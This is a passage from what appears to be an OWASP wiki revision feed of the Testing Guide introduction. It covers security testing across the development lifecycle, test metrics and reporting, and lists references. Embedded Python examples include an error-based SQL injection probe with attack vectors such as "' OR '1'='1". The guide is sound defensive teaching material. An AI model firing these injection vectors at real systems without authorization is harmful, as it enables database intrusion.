After components and code changes are tested by developers and checked into the application build, the most likely next step in the software development process workflow is to perform tests on the application as a whole. This level of testing is usually referred to as integrated test and system level test. When security tests are part of these testing activities, they can be used to validate both the security functionality of the application as a whole and the exposure to application level vulnerabilities. These security tests on the application include both white box testing, such as source code analysis, and black box testing, such as penetration testing. Gray box testing is similar to black box testing, except that the tester is assumed to have some partial knowledge of the application, for example of its session management; such knowledge helps in verifying whether the logout and timeout functions are properly secured.&lt;br /&gt;
&lt;br /&gt;
The target for the security tests is the complete system, that is, the artifact that will potentially be attacked; it includes both the whole source code and the executable. One peculiarity of security testing during this phase is that it is possible for security testers to determine whether vulnerabilities can be exploited and expose the application to real risks. &lt;br /&gt;
These include common web application vulnerabilities, as well as security issues that have been identified earlier in the SDLC with other activities such as threat modeling, source code analysis, and secure code reviews. &lt;br /&gt;
&lt;br /&gt;
Usually, testing engineers, rather than software developers, perform security tests when the application is in scope for integration system tests. Such testing engineers have security knowledge of web application vulnerabilities and of black box and white box security testing techniques, and they own the validation of security requirements in this phase. In order to perform such security tests, it is a prerequisite that security test cases are documented in the security testing guidelines and procedures.&lt;br /&gt;
&lt;br /&gt;
A testing engineer who validates the security of the application in the integrated system environment might release the application for testing in the operational environment (e.g., user acceptance tests). At this stage of the SDLC (i.e., validation), the application functional testing is usually a responsibility of QA testers, while white-hat hackers/security consultants are usually responsible for security testing. Some organizations rely on their own specialized ethical hacking team in order to conduct such tests when a third party assessment is not required (such as for auditing purposes). &lt;br /&gt;
&lt;br /&gt;
Since these tests are the last resort for fixing vulnerabilities before the application is released to production, it is important that such issues are addressed as recommended by the testing team (e.g., the recommendations can include code, design, or configuration change). At this level, security auditors and information security officers discuss the reported security issues and analyze the potential risks according to information risk management procedures. Such procedures might require the developer team to fix all high risk vulnerabilities before the application could be deployed, unless such risks are acknowledged and accepted.&lt;br /&gt;
&lt;br /&gt;
===Developers' Security Tests===&lt;br /&gt;
'''Security Testing in the Coding Phase: Unit Tests'''&amp;lt;br&amp;gt;&lt;br /&gt;
From the developer’s perspective, the main objective of security tests is to validate that code is being developed in compliance with secure coding standards requirements. Developers' own coding artifacts such as functions, methods, classes, APIs, and libraries need to be functionally validated before being integrated into the application build. &lt;br /&gt;
&lt;br /&gt;
The security requirements that developers have to follow should be documented in secure coding standards and validated with static and dynamic analysis. As a testing activity following a secure code review, unit tests can validate that code changes required by secure code reviews are properly implemented. Secure code reviews and source code analysis through source code analysis tools help developers identify security issues in source code as it is developed. By using unit tests and dynamic analysis (e.g., debugging), developers can validate the security functionality of components as well as verify that the countermeasures being developed mitigate any security risks previously identified through threat modeling and source code analysis.&lt;br /&gt;
&lt;br /&gt;
A good practice for developers is to build security test cases as a generic security test suite that is part of the existing unit testing framework. A generic security test suite could be derived from previously defined use and misuse cases to security test functions, methods and classes. A generic security test suite might include security test cases to validate both positive and negative requirements for security controls such as:&lt;br /&gt;
* Authentication &amp;amp; Access Control&lt;br /&gt;
* Input Validation &amp;amp; Encoding&lt;br /&gt;
* Encryption&lt;br /&gt;
* User and Session Management&lt;br /&gt;
* Error and Exception Handling&lt;br /&gt;
* Auditing and Logging&lt;br /&gt;
&lt;br /&gt;
Developers empowered with a source code analysis tool integrated into their IDE, secure coding standards, and a security unit testing framework can assess and verify the security of the software components being developed. Security test cases can be run to identify potential security issues that have root causes in source code: besides input and output validation of parameters entering and exiting the components, these issues include authentication and authorization checks done by the component, protection of the data within the component, secure exception and error handling, and secure auditing and logging. Unit test frameworks such as JUnit, NUnit, and CUnit can be adapted to verify security test requirements. In the case of security functional tests, unit level tests can test the functionality of security controls at the software component level, such as functions, methods, or classes. For example, a test case could validate input and output validation (e.g., variable sanitization) and boundary checks for variables by asserting the expected functionality of the component.&lt;br /&gt;
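An illustrative unit-level security test of this kind, using Python's unittest module as a stand-in for JUnit/NUnit/CUnit. The sanitize() component, its allowlist, and the length bound are hypothetical examples of a component under test.

```python
import unittest

MAX_NAME_LEN = 32  # assumed boundary for the component under test

def sanitize(name: str) -> str:
    """Hypothetical component: strip characters outside an allowlist
    and enforce a length bound."""
    cleaned = "".join(ch for ch in name if ch.isalnum() or ch in "._-")
    if len(cleaned) > MAX_NAME_LEN:
        raise ValueError("input exceeds maximum length")
    return cleaned

class SanitizeSecurityTest(unittest.TestCase):
    def test_strips_sql_metacharacters(self):
        # Quotes, semicolons, and spaces are removed from the input.
        self.assertEqual(sanitize("bob'; DROP TABLE users--"),
                         "bobDROPTABLEusers--")

    def test_length_boundary(self):
        # Exactly at the bound passes; one past the bound is rejected.
        self.assertEqual(sanitize("a" * MAX_NAME_LEN), "a" * MAX_NAME_LEN)
        with self.assertRaises(ValueError):
            sanitize("a" * (MAX_NAME_LEN + 1))
```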
&lt;br /&gt;
The threat scenarios identified with use and misuse cases can be used to document the procedures for testing software components. In the case of authentication components, for example, security unit tests can assert the functionality of setting an account lockout as well as the fact that user input parameters cannot be abused to bypass the account lockout (e.g., by setting the account lockout counter to a negative number). At the component level, security unit tests can validate positive assertions as well as negative assertions, such as errors and exception handling. Exceptions should be caught without leaving the system in an insecure state, such as potential denial of service caused by resources not being deallocated (e.g., connection handles not closed within a final statement block), as well as potential elevation of privileges (e.g., higher privileges acquired before the exception is thrown and not re-set to the previous level before exiting the function). Secure error handling can validate potential information disclosure via informative error messages and stack traces. &lt;br /&gt;
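The negative assertion described above, that the lockout counter cannot be pushed to a negative number to buy an attacker extra guesses, can be sketched as follows. LockoutCounter is a hypothetical stand-in for the real control.

```python
class LockoutCounter:
    """Hypothetical lockout control with a defensive setter."""
    def __init__(self, threshold: int = 5):
        self.threshold = threshold
        self._failures = 0

    def record_failure(self):
        self._failures += 1

    def set_failures(self, value: int):
        # Defensive check: reject negative or non-integer input, which
        # would otherwise reset the counter below zero.
        if not isinstance(value, int) or value < 0:
            raise ValueError("failure count must be a non-negative integer")
        self._failures = value

    @property
    def locked(self) -> bool:
        return self._failures >= self.threshold
```

A security unit test asserts both the positive behavior (lockout at the threshold) and the negative behavior (the setter rejects negative values).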
&lt;br /&gt;
Unit level security test cases can be developed by a security engineer who is the subject matter expert in software security and is also responsible for validating that the security issues in the source code have been fixed and that the code can be checked into the integrated system build. Typically, the manager of the application builds also makes sure that third-party libraries and executable files are security assessed for potential vulnerabilities before being integrated into the application build.&lt;br /&gt;
&lt;br /&gt;
Threat scenarios for common vulnerabilities that have root causes in insecure coding can also be documented in the developer’s security testing guide. When a fix is implemented for a coding defect identified with source code analysis, for example, security test cases can verify that the implementation of the code change follows the secure coding requirements documented in the secure coding standards. &lt;br /&gt;
&lt;br /&gt;
Source code analysis and unit tests can validate that the code change mitigates the vulnerability exposed by the previously identified coding defect. The results of automated secure code analysis can also be used as automatic check-in gates for version control: software artifacts cannot be checked into the build with high or medium severity coding issues.&lt;br /&gt;
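The automatic check-in gate described above can be sketched as a simple severity filter: the check-in is rejected when static analysis reports any high or medium severity finding. The finding record format is an illustrative assumption.

```python
BLOCKING_SEVERITIES = {"high", "medium"}

def may_check_in(findings) -> bool:
    """findings: iterable of dicts such as
    {"id": "SQLI-1", "severity": "high"}. Returns True only when no
    blocking-severity finding is present."""
    return not any(f["severity"] in BLOCKING_SEVERITIES for f in findings)
```

In practice this check would run in the version control hook or build pipeline, fed by the output of the source code analysis tool.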
&lt;br /&gt;
===Functional Testers' Security Tests===&lt;br /&gt;
'''Security Testing During the Integration and Validation Phase: Integrated System Tests and Operation Tests'''&amp;lt;br&amp;gt;&lt;br /&gt;
The main objective of integrated system tests is to validate the “defense in depth” concept, that is, that the implementation of security controls provides security at different layers. For example, the lack of input validation when calling a component integrated with the application is often a factor that can be tested with integration testing. &lt;br /&gt;
&lt;br /&gt;
The integration system test environment is also the first environment where testers can simulate real attack scenarios as can be potentially executed by a malicious external or internal user of the application. Security testing at this level can validate whether vulnerabilities are real and can be exploited by attackers. For example, a potential vulnerability found in source code can be rated as high risk because of the exposure to potential malicious users, as well as because of the potential impact (e.g., access to confidential information).&lt;br /&gt;
Real attack scenarios can be tested with both manual testing techniques and penetration testing tools. Security tests of this type are also referred to as ethical hacking tests. From the security testing perspective, these are risk driven tests and have the objective to test the application in the operational environment. The target is the application build that is representative of the version of the application being deployed into production.&lt;br /&gt;
&lt;br /&gt;
The execution of security in the integration and validation phase is critical to identifying vulnerabilities due to integration of components as well as validating the exposure of such vulnerabilities. Since application security testing requires a specialized set of skills, which includes both software and security knowledge and is not typical of security engineers, organizations are often required to security-train their software developers on ethical hacking techniques, security assessment procedures and tools. A realistic scenario is to develop such resources in-house and document them in security testing guides and procedures that take into account the developer’s security testing knowledge. A so called “security test cases cheat list or check-list”, for example, can provide simple test cases and attack vectors that can be used by testers to validate exposure to common vulnerabilities such as spoofing, information disclosures, buffer overflows, format strings, SQL injection and XSS injection, XML, SOAP, canonicalization issues, denial of service and managed code and ActiveX controls (e.g., .NET). A first battery of these tests can be performed manually with a very basic knowledge of software security. The first objective of security tests might be the validation of a set of minimum security requirements. These security test cases might consist of manually forcing the application into error and exceptional states, and gathering knowledge from the application behavior. For example, SQL injection vulnerabilities can be tested manually by injecting attack vectors through user input and by checking if SQL exceptions are thrown back the user. The evidence of a SQL exception error might be a manifestation of a vulnerability that can be exploited. A more in-depth security test might require the tester’s knowledge of specialized testing techniques and tools. 
Besides source code analysis and penetration testing, these techniques include, for example, source code and binary fault injection, fault propagation analysis and code coverage, fuzz testing, and reverse engineering. The security testing guide should provide procedures and recommend tools that can be used by security testers to perform such in-depth security assessments.&lt;br /&gt;
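The manual error-based SQL injection check described above can be sketched as follows. This is a minimal illustration, not a complete test tool: the target URL, parameter name, attack vectors, and error signatures are assumptions, and such probes must only be run against applications you are authorized to test.

```python
# Sketch of the manual error-based SQL injection probe described above.
# All target details are hypothetical; run only against authorized systems.
import re

# Common database error signatures that may leak through to the client.
SQL_ERROR_PATTERNS = [
    r"you have an error in your sql syntax",    # MySQL
    r"unclosed quotation mark",                 # SQL Server
    r"ora-\d{5}",                               # Oracle
    r"syntax error at or near",                 # PostgreSQL
]

# A few classic attack vectors to force the application into an error state.
ATTACK_VECTORS = ["'", "\"", "' OR '1'='1", "1; --"]

def looks_like_sql_error(response_body: str) -> bool:
    """Return True if the response appears to contain a raw SQL exception."""
    body = response_body.lower()
    return any(re.search(p, body) for p in SQL_ERROR_PATTERNS)

def probe(fetch, base_url: str, param: str):
    """Send each attack vector via `fetch(url)` and collect suspicious vectors.

    `fetch` is injected (e.g., a wrapper around urllib) so the probe can be
    exercised without network access.
    """
    findings = []
    for vector in ATTACK_VECTORS:
        body = fetch(f"{base_url}?{param}={vector}")
        if looks_like_sql_error(body):
            findings.append(vector)
    return findings
```

A raw database error surfacing to the client, as checked here, is exactly the kind of evidence of exploitability that the text describes.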
&lt;br /&gt;
The next level of security testing after integration system tests is to perform security tests in the user acceptance environment. There are unique advantages to performing security tests in the operational environment. The user acceptance testing (UAT) environment is the one that is most representative of the release configuration, with the exception of the data (e.g., test data is used in place of real data). A characteristic of security testing in UAT is testing for security configuration issues. In some cases these vulnerabilities might represent high risks. For example, the server that hosts the web application might not be configured with minimum privileges, a valid SSL certificate, or a secure configuration; it might still run non-essential services; and its web root directory might not be cleaned of test and administration web pages.&lt;br /&gt;
&lt;br /&gt;
===Security Test Data Analysis and Reporting===&lt;br /&gt;
'''Goals for Security Test Metrics and Measurements'''&amp;lt;br&amp;gt;&lt;br /&gt;
The definition of the goals for the security testing metrics and measurements is a pre-requisite for using security testing data for risk analysis and management processes. For example, a measurement such as the total number of vulnerabilities found with security tests might quantify the security posture of the application. These measurements also help to identify security objectives for software security testing: for example, reducing the number of vulnerabilities to an acceptable number (minimum) before the application is deployed into production. &lt;br /&gt;
&lt;br /&gt;
Another manageable goal could be to compare the application security posture against a baseline to assess improvements in application security processes. For example, the security metrics baseline might consist of an application that was tested only with penetration tests. The security data obtained from an application that was also security tested during coding should show an improvement (e.g., fewer vulnerabilities) when compared with the baseline.&lt;br /&gt;
&lt;br /&gt;
In traditional software testing, the number of software defects, such as the bugs found in an application, could provide a measure of software quality. Similarly, security testing can provide a measure of software security. From the defect management and reporting perspective, software quality and security testing can use similar categorizations for root causes and defect remediation efforts. From the root cause perspective, a security defect can be due to an error in design (e.g., security flaws) or due to an error in coding (e.g., security bug). From the perspective of the effort required to fix a defect, both security and quality defects can be measured in terms of developer hours to implement the fix, the tools and resources required to fix, and, finally, the cost to implement the fix.&lt;br /&gt;
&lt;br /&gt;
A characteristic of security test data, compared to quality data, is the categorization in terms of the threat, the exposure of the vulnerability, and the potential impact posed by the vulnerability to determine the risk. Testing applications for security consists of managing technical risks to make sure that the application countermeasures meet acceptable levels. For this reason, security testing data needs to support the security risk strategy at critical checkpoints during the SDLC. For example, vulnerabilities found in source code with source code analysis represent an initial measure of risk. Such a measure of risk (e.g., high, medium, low) for the vulnerability can be calculated by determining the exposure and likelihood factors, and further by validating the vulnerability with penetration tests. The risk metrics associated with vulnerabilities found with security tests empower business management to make risk management decisions, such as whether risks can be accepted, mitigated, or transferred at different levels within the organization (e.g., business as well as technical).&lt;br /&gt;
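As an illustration of deriving a risk level from likelihood and impact factors, the sketch below scores each on a 0-9 scale and combines them through a severity matrix. The bands and matrix values are illustrative, written in the spirit of the OWASP Risk Rating Methodology; they are not a prescribed standard, and the factor lists are hypothetical.

```python
# Illustrative risk-severity calculation: likelihood and impact factors are
# each averaged on a 0-9 scale, bucketed, and combined via a severity matrix.
# Thresholds (0-<3 LOW, 3-<6 MEDIUM, 6-9 HIGH) and matrix values are examples.

def level(score: float) -> str:
    """Bucket an averaged 0-9 factor score into a qualitative level."""
    if score < 3:
        return "LOW"
    if score < 6:
        return "MEDIUM"
    return "HIGH"

# Overall severity matrix: (likelihood level, impact level) -> risk rating.
SEVERITY = {
    ("LOW", "LOW"): "Low",     ("LOW", "MEDIUM"): "Low",     ("LOW", "HIGH"): "Medium",
    ("MEDIUM", "LOW"): "Low",  ("MEDIUM", "MEDIUM"): "Medium", ("MEDIUM", "HIGH"): "High",
    ("HIGH", "LOW"): "Medium", ("HIGH", "MEDIUM"): "High",   ("HIGH", "HIGH"): "Critical",
}

def risk_rating(likelihood_factors, impact_factors) -> str:
    """Combine averaged likelihood and impact factors into an overall rating."""
    likelihood = sum(likelihood_factors) / len(likelihood_factors)
    impact = sum(impact_factors) / len(impact_factors)
    return SEVERITY[(level(likelihood), level(impact))]
```

For example, a vulnerability with high likelihood factors but low impact factors would land in the "Medium" cell, matching the intuition that exposure and consequence must be weighed together.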
&lt;br /&gt;
When evaluating the security posture of an application, it is important to take into consideration certain factors, such as the size of the application being developed. Application size has been statistically proven to be related to the number of issues found in the application with tests. One measure of application size is the number of lines of code (LOC) of the application. Typically, software quality defects range from about 7 to 10 defects per thousand lines of new and changed code [21]. Since a single test pass can reduce the overall number of defects by about 25%, it is logical for larger applications to be tested more, and more often, than smaller applications.&lt;br /&gt;
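The defect-density figures above can be turned into a back-of-the-envelope estimate. Assuming the cited 7 to 10 defects per thousand lines of code (KLOC), with 8.5 taken here as an arbitrary midpoint, and roughly 25% defect removal per test pass:

```python
# Back-of-the-envelope defect estimate using the figures cited above:
# roughly 7-10 quality defects per KLOC of new/changed code, and a single
# test pass removing about 25% of the remaining defects.

def estimated_defects(kloc: float, defects_per_kloc: float = 8.5) -> float:
    """Expected latent defects for `kloc` thousand lines of new/changed code."""
    return kloc * defects_per_kloc

def after_test_passes(defects: float, passes: int, removal_rate: float = 0.25) -> float:
    """Defects remaining after `passes` test passes, each removing ~25%."""
    return defects * (1 - removal_rate) ** passes

initial = estimated_defects(100)           # a 100 KLOC application -> 850.0
remaining = after_test_passes(initial, 3)  # after three test passes
```

The diminishing-returns shape of `after_test_passes` is why larger applications warrant more, and more frequent, test passes.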
&lt;br /&gt;
When security testing is done in several phases of the SDLC, the test data can prove the capability of the security tests to detect vulnerabilities as soon as they are introduced, and the effectiveness of removing them by implementing countermeasures at different checkpoints of the SDLC. A measurement of this type is also referred to as a “containment metric” and provides a measure of the ability of a security assessment performed at each phase of the development process to keep vulnerabilities contained within that phase. Containment metrics are also a critical factor in lowering the cost of fixing vulnerabilities, since it is less expensive to deal with a vulnerability in the same phase of the SDLC in which it is found, rather than fixing it later in another phase. &lt;br /&gt;
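A containment metric of the kind described can be computed per phase as the fraction of vulnerabilities introduced in a phase that are also caught in that phase rather than escaping to a later, more expensive one. The phase names and counts below are hypothetical:

```python
# Simple phase containment metric: for each SDLC phase, the fraction of
# vulnerabilities introduced there that were also caught there, rather than
# escaping to a later phase. Phase names and counts are illustrative only.

def containment(found_in_phase: int, escaped_to_later: int) -> float:
    """Containment = caught in phase / total introduced in that phase."""
    total = found_in_phase + escaped_to_later
    return found_in_phase / total if total else 1.0

phases = {
    # phase: (vulns caught in the phase, vulns from this phase found later)
    "design": (12, 3),
    "coding": (40, 10),
    "integration": (8, 2),
}
report = {p: round(containment(caught, escaped), 2)
          for p, (caught, escaped) in phases.items()}
```

A low containment value for a phase signals that its security assessment is letting vulnerabilities escape to later, costlier phases.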
&lt;br /&gt;
Security test metrics can support security risk, cost, and defect management analysis when they are associated with tangible and timed goals such as: &lt;br /&gt;
*Reducing the overall number of vulnerabilities by 30%&lt;br /&gt;
*Fixing security issues by a certain deadline (e.g., before the beta release) &lt;br /&gt;
&lt;br /&gt;
Security test data can be absolute, such as the number of vulnerabilities detected during manual code review, as well as comparative, such as the number of vulnerabilities detected in code reviews vs. penetration tests. To answer questions about the quality of the security process, it is important to determine a baseline for what could be considered acceptable and good. &lt;br /&gt;
&lt;br /&gt;
Security test data can also support specific objectives of the security analysis such as compliance with security regulations and information security standards, management of security processes, the identification of security root causes and process improvements, and security costs vs. benefits analysis.&lt;br /&gt;
&lt;br /&gt;
When security test data is reported it has to provide metrics to support the analysis. The scope of the analysis is the interpretation of test data to find clues about the security of the software being produced, as well as the effectiveness of the process. &lt;br /&gt;
Some examples of clues supported by security test data can be:&lt;br /&gt;
*Are vulnerabilities reduced to an acceptable level for release?&lt;br /&gt;
*How does the security quality of this product compare with similar software products?&lt;br /&gt;
*Are all security test requirements being met? &lt;br /&gt;
*What are the major root causes of security issues?&lt;br /&gt;
*How numerous are security flaws compared to security bugs?&lt;br /&gt;
*Which security activity is most effective in finding vulnerabilities?&lt;br /&gt;
*Which team is more productive in fixing security defects and vulnerabilities?&lt;br /&gt;
*What percentage of overall vulnerabilities are high risk?&lt;br /&gt;
*Which tools are most effective in detecting security vulnerabilities?&lt;br /&gt;
*Which kinds of security tests are most effective in finding vulnerabilities (e.g., white box vs. black box tests)?&lt;br /&gt;
*How many security issues are found during secure code reviews?&lt;br /&gt;
*How many security issues are found during secure design reviews?&lt;br /&gt;
&lt;br /&gt;
In order to make a sound judgment using the testing data, it is important to have a good understanding of the testing process as well as the testing tools. A tool taxonomy should be adopted to decide which security tools to use. Security tools can be qualified as being good at finding common, known vulnerabilities when targeting different artifacts.&lt;br /&gt;
The issue is that unknown security issues are not tested for: the fact that a tool comes out clean does not mean that your software or application is secure. Some studies [22] have demonstrated that, at best, tools can find only 45% of overall vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
Even the most sophisticated automation tools are not a match for an experienced security tester: just relying on successful test results from automation tools will give security practitioners a false sense of security.  Typically, the more experienced the security testers are with the security testing methodology and testing tools, the better the results of the security test and analysis will be. It is important that managers making an investment in security testing tools also consider an investment in hiring skilled human resources as well as security test training.&lt;br /&gt;
&lt;br /&gt;
'''Reporting Requirements'''&amp;lt;br&amp;gt;&lt;br /&gt;
The security posture of an application can be characterized from the perspective of the effect, such as the number of vulnerabilities and the risk rating of the vulnerabilities, as well as from the perspective of the cause (i.e., origin), such as coding errors, architectural flaws, and configuration issues.  &lt;br /&gt;
&lt;br /&gt;
Vulnerabilities can be classified according to different criteria. The classification can be statistical, as in the OWASP Top 10 and the WASC Web Application Security Statistics project, or related to defensive controls, as in the case of the Web Application Security Frame (WASF) categorization.&lt;br /&gt;
&lt;br /&gt;
When reporting security test data, the best practice is to include the following information, besides the categorization of each vulnerability by type:&lt;br /&gt;
*The security threat that the issue is exposed to&lt;br /&gt;
*The root cause of the security issue (e.g., security bug, security flaw)&lt;br /&gt;
*The testing technique used to find it&lt;br /&gt;
*The remediation of the vulnerability (e.g., the countermeasure) &lt;br /&gt;
*The risk rating of the vulnerability (High, Medium, Low)&lt;br /&gt;
&lt;br /&gt;
By describing what the security threat is, it will be possible to understand if and why the mitigation control is ineffective in mitigating the threat. &lt;br /&gt;
&lt;br /&gt;
Reporting the root cause of the issue can help pinpoint what needs to be fixed: in the case of white box testing, for example, the software security root cause of the vulnerability will be the offending source code. &lt;br /&gt;
&lt;br /&gt;
Once issues are reported, it is also important to provide guidance to the software developer on how to re-test and find the vulnerability. This might involve using a white box testing technique (e.g., security code review with a static code analyzer) to find if the code is vulnerable. If a vulnerability can be found via a black box technique (penetration test), the test report also needs to provide information on how to validate the exposure of the vulnerability to the front end (e.g., client).&lt;br /&gt;
&lt;br /&gt;
The information about how to fix the vulnerability should be detailed enough for a developer to implement a fix. It should include secure coding examples and configuration changes, and provide adequate references.&lt;br /&gt;
&lt;br /&gt;
Finally, the risk rating helps to prioritize the remediation effort. Typically, assigning a risk rating to the vulnerability involves a risk analysis based upon factors such as impact and exposure.&lt;br /&gt;
&lt;br /&gt;
'''Business Cases'''&amp;lt;br&amp;gt; &lt;br /&gt;
For the security test metrics to be useful, they need to provide value back to the organization's security test data stakeholders, such as project managers, developers, information security offices, auditors, and chief information officers. The value can be in terms of the business case that each project stakeholder has, according to their role and responsibility.&lt;br /&gt;
&lt;br /&gt;
Software developers look at security test data to show that software is coded more securely and efficiently, so that they can make the case for using source code analysis tools, following secure coding standards, and attending software security training. &lt;br /&gt;
&lt;br /&gt;
Project managers look for data that allows them to successfully manage and utilize security testing activities and resources according to the project plan. To project managers, security test data can show that projects are on schedule, on target for delivery dates, and improving during tests. &lt;br /&gt;
&lt;br /&gt;
Security test data also helps the business case for security testing if the initiative comes from information security officers (ISOs). For example, it can provide evidence that security testing during the SDLC does not impact the project delivery, but rather reduces the overall workload needed to address vulnerabilities later in production. &lt;br /&gt;
&lt;br /&gt;
To compliance auditors, security test metrics provide a level of software security assurance and confidence that security standard compliance is addressed through the security review processes within the organization. &lt;br /&gt;
&lt;br /&gt;
Finally, Chief Information Officers (CIOs) and Chief Information Security Officers (CISOs), who are responsible for the budget that needs to be allocated to security resources, look to derive a cost/benefit analysis from security test data in order to make informed decisions about which security activities and tools to invest in. One of the metrics that supports such analysis is the Return On Investment (ROI) in Security [23]. To derive such metrics from security test data, it is important to quantify the differential between the risk due to the exposure of vulnerabilities and the effectiveness of the security tests in mitigating the security risk, and to factor this gap against the cost of the security testing activity or the testing tools adopted.&lt;br /&gt;
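One simplified way to express such a cost/benefit comparison is a Return On Security Investment (ROSI) ratio: mitigated risk exposure minus the cost of testing, divided by that cost. The formula and all figures below are illustrative assumptions, not the specific method of reference [23].

```python
# Simplified ROSI sketch: compare the annual risk exposure mitigated by
# security testing against the cost of the testing itself.
# ALE = Annualized Loss Expectancy. All figures are illustrative.

def rosi(ale: float, mitigation_ratio: float, cost: float) -> float:
    """ROSI = (risk reduced by the investment - its cost) / cost."""
    return (ale * mitigation_ratio - cost) / cost

# E.g., $500k expected annual loss, testing assumed to mitigate 60% of it,
# at a $100k testing cost: (300k - 100k) / 100k = 2.0 (a 200% return).
roi = rosi(ale=500_000, mitigation_ratio=0.60, cost=100_000)
```

A ratio above zero indicates the testing investment mitigates more risk than it costs; the hard part in practice is estimating the ALE and mitigation ratio from security test data.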
&lt;br /&gt;
== References ==&lt;br /&gt;
[1] T. DeMarco, ''Controlling Software Projects: Management, Measurement and Estimation'', Yourdon Press, 1982&lt;br /&gt;
&lt;br /&gt;
[2] S. Payne, ''A Guide to Security Metrics'' - http://www.sans.org/reading_room/whitepapers/auditing/55.php&lt;br /&gt;
&lt;br /&gt;
[3] NIST, ''The economic impacts of inadequate infrastructure for software testing'' - http://www.nist.gov/public_affairs/releases/n02-10.htm&lt;br /&gt;
&lt;br /&gt;
[4] Ross Anderson, ''Economics and Security Resource Page'' - http://www.cl.cam.ac.uk/users/rja14/econsec.html &lt;br /&gt;
&lt;br /&gt;
[5] Denis Verdon, ''Teaching Developers To Fish'' - [[OWASP AppSec NYC 2004]]&lt;br /&gt;
&lt;br /&gt;
[6] Bruce Schneier, ''Cryptogram Issue #9'' - http://www.schneier.com/crypto-gram-0009.html&lt;br /&gt;
&lt;br /&gt;
[7] Symantec, ''Threat Reports'' -  http://www.symantec.com/business/theme.jsp?themeid=threatreport&lt;br /&gt;
&lt;br /&gt;
[8] FTC, ''The Gramm-Leach Bliley Act'' - http://www.ftc.gov/privacy/privacyinitiatives/glbact.html&lt;br /&gt;
&lt;br /&gt;
[9] Senator Peace and Assembly Member Simitian, ''SB 1386''- http://www.leginfo.ca.gov/pub/01-02/bill/sen/sb_1351-1400/sb_1386_bill_20020926_chaptered.html&lt;br /&gt;
&lt;br /&gt;
[10] European Union, ''Directive 95/46/EC on the protection of individuals with regard to the processing of personal data and on the free movement of such data'' -&lt;br /&gt;
http://ec.europa.eu/justice_home/fsj/privacy/docs/95-46-ce/dir1995-46_part1_en.pdf&lt;br /&gt;
&lt;br /&gt;
[11] NIST, '' Risk management guide for information technology systems'' - http://csrc.nist.gov/publications/nistpubs/800-30/sp800-30.pdf&lt;br /&gt;
&lt;br /&gt;
[12] SEI, Carnegie Mellon, ''Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE)'' - http://www.cert.org/octave/&lt;br /&gt;
&lt;br /&gt;
[13] Ken Thompson, ''Reflections on Trusting Trust'', reprinted from Communications of the ACM - http://cm.bell-labs.com/who/ken/trust.html&lt;br /&gt;
&lt;br /&gt;
[14] Gary McGraw, ''Beyond the Badness-ometer'' - http://www.ddj.com/security/189500001&lt;br /&gt;
&lt;br /&gt;
[15] FFIEC, '' Authentication in an Internet Banking Environment'' - http://www.ffiec.gov/pdf/authentication_guidance.pdf&lt;br /&gt;
&lt;br /&gt;
[16] PCI Security Standards Council, ''PCI Data Security Standard'' - https://www.pcisecuritystandards.org/security_standards/pci_dss.shtml &lt;br /&gt;
&lt;br /&gt;
[17] MSDN, ''Cheat Sheet: Web Application Security Frame'' - http://msdn.microsoft.com/en-us/library/ms978518.aspx#tmwacheatsheet_webappsecurityframe &lt;br /&gt;
&lt;br /&gt;
[18] MSDN, ''Improving Web Application Security, Chapter 2, Threat And Countermeasures'' - http://msdn.microsoft.com/en-us/library/aa302418.aspx&lt;br /&gt;
&lt;br /&gt;
[19] Gil Regev, Ian Alexander, Alain Wegmann, ''Use Cases and Misuse Cases Model the Regulatory Roles of Business Processes'' - http://easyweb.easynet.co.uk/~iany/consultancy/regulatory_processes/regulatory_processes.htm&lt;br /&gt;
&lt;br /&gt;
[20] Sindre, G., Opdahl, A., ''Capturing Security Requirements Through Misuse Cases'' - http://folk.uio.no/nik/2001/21-sindre.pdf&lt;br /&gt;
&lt;br /&gt;
[21] Security Across the Software Development Lifecycle Task Force, ''Referred Data from Capers Jones, Software Assessments, Benchmarks and Best Practices'' - http://www.cyberpartnership.org/SDLCFULL.pdf&lt;br /&gt;
&lt;br /&gt;
[22] MITRE, ''Being Explicit About Weaknesses, Slide 30, Coverage of CWE'' - http://cwe.mitre.org/documents/being-explicit/BlackHatDC_BeingExplicit_Slides.ppt&lt;br /&gt;
&lt;br /&gt;
[23] Marco Morana, ''Building Security Into The Software Life Cycle, A Business Case'' - http://www.blackhat.com/presentations/bh-usa-06/bh-us-06-Morana-R3.0.pdf&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_Guide_Introduction&amp;diff=61740</id>
		<title>Testing Guide Introduction</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_Guide_Introduction&amp;diff=61740"/>
				<updated>2009-05-25T20:47:38Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Functional and Non Functional Test Requirements */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
=== The OWASP Testing Project ===&lt;br /&gt;
----&lt;br /&gt;
The OWASP Testing Project has been in development for many years. With this project, we wanted to help people understand the ''what'', ''why'', ''when'', ''where'', and ''how'' of testing their web applications, and not just provide a simple checklist or prescription of issues that should be addressed. The outcome of this project is a complete Testing Framework, from which others can build their own testing programs or qualify other people’s processes. The Testing Guide describes in detail both the general Testing Framework and the techniques required to implement the framework in practice.&lt;br /&gt;
&lt;br /&gt;
Writing the Testing Guide has proven to be a difficult task. It has been a challenge to obtain consensus and develop the content that allows people to apply the concepts described here, while enabling them to work in their own environment and culture. It has also been a challenge to change the focus of web application testing from penetration testing to testing integrated in the software development life cycle. &lt;br /&gt;
&lt;br /&gt;
However, we are very satisfied with the results we have reached. Many industry experts and those responsible for software security at some of the largest companies in the world are validating the Testing Framework. This framework helps organizations test their web applications in order to build reliable and secure software, rather than simply highlighting areas of weakness, although the latter is certainly a byproduct of many of OWASP’s guides and checklists. As such, we have made some hard decisions about the appropriateness of certain testing techniques and technologies, which we fully understand will not be agreed upon by everyone. However, OWASP is able to take the high ground and change culture over time through awareness and education based on consensus and experience.&lt;br /&gt;
&lt;br /&gt;
The rest of this guide is organized as follows. This introduction covers the pre-requisites of testing web applications: the scope of testing, the principles of successful testing, and testing techniques. Chapter 3 presents the OWASP Testing Framework and explains its techniques and tasks in relation to the various phases of the software development life cycle. Chapter 4 covers how to test for specific vulnerabilities (e.g., SQL Injection) by code inspection and penetration testing. &lt;br /&gt;
&lt;br /&gt;
